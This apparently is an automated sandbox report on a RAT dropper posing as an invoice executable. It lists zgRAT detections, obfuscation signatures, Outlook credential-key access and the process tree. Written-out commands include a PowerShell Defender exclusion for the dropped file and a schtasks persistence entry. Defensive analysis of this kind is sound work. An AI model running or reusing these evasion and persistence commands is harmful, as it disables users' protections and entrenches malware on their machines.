                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.363028287.0000000005DD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.363243179.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.363307593.0000000005DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/t-F
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.363028287.0000000005DD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnhtn
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.367109894.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.360854011.0000000005DDB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.360864782.0000000005DDB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.360830990.0000000005DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.360891857.0000000005DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.compew
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: unknownDNS traffic detected: queries for: mail.gimpex-imerys.com
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.396629215.0000000001168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary

                barindex
                Source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: initial sampleStatic PE information: Filename: INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 5.2.txQleCu.exe.4561c18.7.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 12.2.txQleCu.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 5.2.txQleCu.exe.4561c18.7.raw.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 5.2.txQleCu.exe.45389f8.4.raw.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 5.2.txQleCu.exe.45389f8.4.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 5.2.txQleCu.exe.450b5d8.3.raw.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.raw.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.raw.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_05356E10
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_05356E00
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_0A6D6A08
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_0A6D8018
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_0A6D69F8
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_0A6D0040
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_0A6D0012
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_0A6D9FD8
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_0A6D1D85
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0196F0C0
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0196B1B4
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0196DA10
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0196DA20
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_05806E10
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_05806E00
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0AAB6A08
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0AAB8018
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0AAB6A07
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0AABA2F0
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0AAB003F
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0AAB0040
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0AAB1D85
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_02E3C8F8
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_02E3A938
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_02E39D20
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_02E3A068
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_02E359D8
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_062C9680
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_062C4020
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_062C2C31
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_062C6638
                Source: INVOICE_NO._29998172.exe, 00000000.00000000.358217407.0000000000A72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametSku.exe4 vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.399658088.000000000407C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename848e54a8-d802-4186-a62a-e43bdbd99dfb.exe4 vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.399658088.000000000407C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRegive.dll4 vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.398102973.0000000002EB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename848e54a8-d802-4186-a62a-e43bdbd99dfb.exe4 vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.406572369.00000000075F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRegive.dll4 vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.396629215.0000000001168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exe, 00000006.00000002.627240721.000000000104A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exe, 00000006.00000002.627137517.0000000000EF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exeBinary or memory string: OriginalFilenametSku.exe4 vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: txQleCu.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: INVOICE_NO._29998172.exeReversingLabs: Detection: 25%
                Source: INVOICE_NO._29998172.exeVirustotal: Detection: 34%
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile read: C:\Users\user\Desktop\INVOICE_NO._29998172.exeJump to behavior
                Source: INVOICE_NO._29998172.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\INVOICE_NO._29998172.exe C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\txQleCu.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\txQleCu.exe C:\Users\user\AppData\Roaming\txQleCu.exe
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Users\user\Desktop\INVOICE_NO._29998172.exe C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmp3339.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess created: C:\Users\user\AppData\Roaming\txQleCu.exe C:\Users\user\AppData\Roaming\txQleCu.exe
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\txQleCu.exe
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Users\user\Desktop\INVOICE_NO._29998172.exe C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmp3339.tmp
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess created: C:\Users\user\AppData\Roaming\txQleCu.exe C:\Users\user\AppData\Roaming\txQleCu.exe
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile created: C:\Users\user\AppData\Roaming\txQleCu.exeJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile created: C:\Users\user\AppData\Local\Temp\tmpEB82.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/9@4/2
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: INVOICE_NO._29998172.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6376:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_01
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeMutant created: \Sessions\1\BaseNamedObjects\XnqqSrOjyYQnupRuSLWCZVFSe
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.367109894.0000000005DCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ing.slnt
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.367013515.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.367056781.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.366997958.0000000005DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rtising.slnt
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: INVOICE_NO._29998172.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: INVOICE_NO._29998172.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: INVOICE_NO._29998172.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: tSku.pdb source: INVOICE_NO._29998172.exe, txQleCu.exe.0.dr
                Source: Binary string: tSku.pdbSHA256[ source: INVOICE_NO._29998172.exe, txQleCu.exe.0.dr

                Data Obfuscation

                barindex
                Source: INVOICE_NO._29998172.exe, DekkerProject/FormMain.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: txQleCu.exe.0.dr, DekkerProject/FormMain.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: 0.0.INVOICE_NO._29998172.exe.a70000.0.unpack, DekkerProject/FormMain.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0196E760 pushfd ; ret
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_02E3DA3B pushfd ; ret
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_062C7978 pushad ; ret
                Source: initial sampleStatic PE information: section name: .text entropy: 7.762983884529855
                Source: initial sampleStatic PE information: section name: .text entropy: 7.762983884529855
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile created: C:\Users\user\AppData\Roaming\txQleCu.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
